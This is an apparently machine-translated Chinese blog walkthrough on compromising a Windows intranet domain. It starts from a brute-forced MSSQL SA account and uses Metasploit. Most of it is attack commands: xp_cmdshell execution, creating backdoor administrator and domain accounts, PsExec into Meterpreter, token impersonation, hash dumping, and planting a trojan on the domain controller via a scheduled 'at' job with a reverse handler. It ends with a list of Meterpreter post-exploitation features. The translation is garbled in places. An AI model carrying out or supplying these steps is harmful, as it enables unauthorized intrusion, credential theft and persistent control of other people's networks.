Attacking the client PC through SA permissions, to the intranet domain Infiltration system class

Overall frame diagram

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M02/5B/45/wKiom1UDxHHwQFHOAAEFNonb3io857.jpg "title=" Picture 1.png "alt=" Wkiom1udxhhwqfhoaaefnonb3io857.jpg "/>

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/5B/3F/wKioL1UDxafD2Ll9AACWNarE2vc043.jpg "title=" Picture 2.png "alt=" Wkiol1udxafd2ll9aacwnare2vc043.jpg "/>

Leveraging MSF

Use Auxiliary/scanner/portscan/tcp

Some of the related ports can be swept.

After discovery of port 1433, a brute force attempt was made against MSSQL.

Mssql_login

After the crack (this crack also mainly look at the dictionary) to carry out the characteristics of MSSQL, xp_cmdshell command operation

Use Auxiliary/scanner/mssql/mssql_exec

Set rhost IP

Set username SA

Set Password Password

Set cmd whoami//This is the point, here's the command

Exploit

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M01/5B/3F/wKioL1UDxcfy0FHTAAB6b0pkNUU357.jpg "title=" Picture 3.png "alt=" Wkiol1udxcfy0fhtaab6b0pknuu357.jpg "/>

If you are adding users

Set cmd net users Kaifeng kaifeng/add

Exploit

Once a command is executed, the next execution command will be re-cmd

Set cmd net localgroup administrators Kaifeng/add

Exploit

Attack execution Complete

Using PsExec

Make a bounce connection and get a Meterpreter

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/5B/3F/wKioL1UDxfCy_1oAAABaItV0cf4622.jpg "title=" Picture 5.png "alt=" Wkiol1udxfcy_1oaaabaitv0cf4622.jpg "/>

Run GETGUI-E

Use Auxiliary/scanner/portscan/tcp

Exploit

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/5B/45/wKiom1UDxQPBGVJUAABDrD5AJ3U489.jpg "title=" Picture 6.png "alt=" Wkiom1udxqpbgvjuaabdrd5aj3u489.jpg "/>

Proof 3389 is open.

Start stealing tokens

Use Incognito

List_tokens-u

Impersonate_token the tokens listed above

If it succeeds, it has already been attacked by another host. Can enter the shell port for WhoAmI to view

Then set up a domain administrator to log in and manage the entire domain

Net users Kaifeng Kaifeng/add/domain

Net localgroup Administrators Kaifeng/add/domain

Then use

Psexec login, user name and password have been established

After the login is successful, you can view the management of the whole domain.

View the hash value of the entire domain by Meterpreter Dumphash

If you take down a domain administrator, you can use the export hash to get the other machine when you want to take down the other machines. Or the use of tokens to other machines, and then upload a trojan, into the shell, set a time to execute, in the MSF to listen, you can get permissions.

Below the domain administrator

Meterpreter > Upload/var/www/door.exe c \

Meterpreter > Shell

C:\windows\system32>dir c \

c:\windows\system32> replication to DIS9 domain management

C:\>copy Door.exe \\DIS9TEAM-DOMAIN\c$
Copy door.exe \\DIS9TEAM-DOMAIN\c$

C:\>
Time to get Dis9team-domain
C:\>net time \\DIS9TEAM-DOMAIN

C:\>
Time is 05.02, add a job 5.04 run Trojan Door.exe then MSF listens
C:\at \\DIS9TEAM-DOMAIN 05:04 C:\door.exe
At \\DIS9TEAM-DOMAIN 05:04 C:\door.exe

C:\>exit
Meterpreter > Background
[*] Backgrounding Session 2 ...
MSF exploit (handler) > Exploit
[*] Started Reverse Handler on 1.1.1.3:4444
[*] Starting the payload handler.

You can use this method to get the other machine.

Knowledge expansion

Featured feature 1: Quick right
Getsystem command to quickly withdraw power
There's nothing simpler than this.
One instruction, you have system permissions.

Meterpreter will try to get you system permissions in a variety of ways

Featured Features 2:hashdump
Running this command: Run Post/windows/gather/hashdump
A command you will be able to get the contents of the SAM database in Windows
is an encrypted user name and password

Featured feature 3: Direct open 3389
The Getgui command is a newly added command Meterpreter
This command allows you to easily open 3389 remote management on the target system.
This command has two uses: Run GETGUI-E (just hitKaiyuanProcess Management)
Run Getgui-u hacker-p s3cr3t (hitKaiyuanProcess management and create a new username for the hacker password for the S3CR3T account)

Featured feature 4: Networksniffing
Meterpreter has a very strong networksniffingAbility
It can be networked without any drivers installed on the target systemsniffing
And it's smart enough to get its own traffic to be ignored.

Featured feature 5: Network relay
Often invade LAN hackers encounter the biggest difficulties when unable to cross the NAT
Now, with the Meterpreter, it's easy.
Meterpreter can turn a computer you've hacked into a trunk to invade another computer on the same LAN.

This article is from the "Redbull" blog, make sure to keep this source http://redbull.blog.51cto.com/9796528/1620309

Attacking the client PC through SA permissions, to the intranet domain Infiltration system class